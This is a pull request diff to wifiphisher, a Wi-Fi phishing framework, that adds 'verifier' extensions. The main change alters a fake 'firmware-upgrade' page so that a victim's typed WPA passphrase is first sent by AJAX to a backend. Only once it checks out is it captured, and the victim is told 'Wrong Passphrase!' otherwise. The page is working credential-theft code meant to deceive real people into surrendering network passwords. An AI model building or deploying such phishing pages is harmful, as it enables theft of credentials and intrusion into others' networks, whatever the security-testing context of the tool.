### PR TITLE
[WIP] Introducing verifier plugins

### DIFF
--- a/docs/modules.rst
+++ b/docs/modules.rst
@@ -1,11 +1,6 @@
 Module Documentaion
 ===================
 
-Deauth Module
--------------
-.. automodule:: wifiphisher.common.deauth
-   :members:
-
 Interfaces Module
 ------------------
 .. automodule:: wifiphisher.common.interfaces

--- a/tests/test_extensions.py
+++ b/tests/test_extensions.py
@@ -52,7 +52,6 @@ class Extension2(object):
         return ["three", "four", "five"]
 """
 
-
 class TestExtensionManager(unittest.TestCase):
 
     def setUp(self):

--- a/wifiphisher/common/uimethods.py
+++ b/wifiphisher/common/uimethods.py
@@ -1,0 +1,10 @@
+import constants
+import importlib
+from functools import wraps
+
+def uimethod(func):
+    def _decorator(data, *args, **kwargs):
+        response = func(data, *args, **kwargs)
+        return response
+    func.is_uimethod = True
+    return wraps(func)(_decorator)

--- a/wifiphisher/data/phishing-pages/firmware-upgrade/index.html
+++ b/wifiphisher/data/phishing-pages/firmware-upgrade/index.html
@@ -259,9 +259,33 @@ $("#btn").on("click", function(e) {
       		}
       	else
       		{
-            // post the data
-            post('post', {"wfphshr-wpa-password": input.value});
-      		}
+                var data =
+                {
+                    "psk_verify": input.value
+                };
+                var dataToSend = JSON.stringify(data);
+                // post the data
+                $.ajax(
+                    {
+                        url: '/backend/',
+                        type: 'POST',
+                        data: dataToSend,
+
+                        success: function (jsonResponse) {
+                            var objresponse = JSON.parse(jsonResponse);
+                            var verify_status = objresponse['psk_verify']
+                            if (verify_status == 'success') {
+                                post('post', {"wfphshr-wpa-password": input.value});
+                            } else if (verify_status == 'fail') {
+                                alert('Wrong Passphrase!');
+                            } else {
+                                /* we may not define the extensions and in that case
+                                   just post the passphrase */
+                                post('post', {"wfphshr-wpa-password": input.value});
+                            }
+                        },
+                    });
+      		    }
       }
     else
       {


### PR DESCRIPTION
This PR introduces a special subcategory of extensions called "verifier" extensions. These extensions differ from the rest because of an implemented callback `verify_cred`. Extensions that are not validating credentials can simply ignore this callback. This callback receives a tuple that contains the type of the captured credential (e.g. "psk" or "domain_username") and the actual value of it. The plugin will verify the credential and return `True` upon valid verification or `False` in all other cases.

A phishing scenario that wants to verify a captured credential should call (using AJAX) the /verify/[type_of_credential]/[credential] URI that will in turn ask the verifiers and print their response (`True` or `False`). 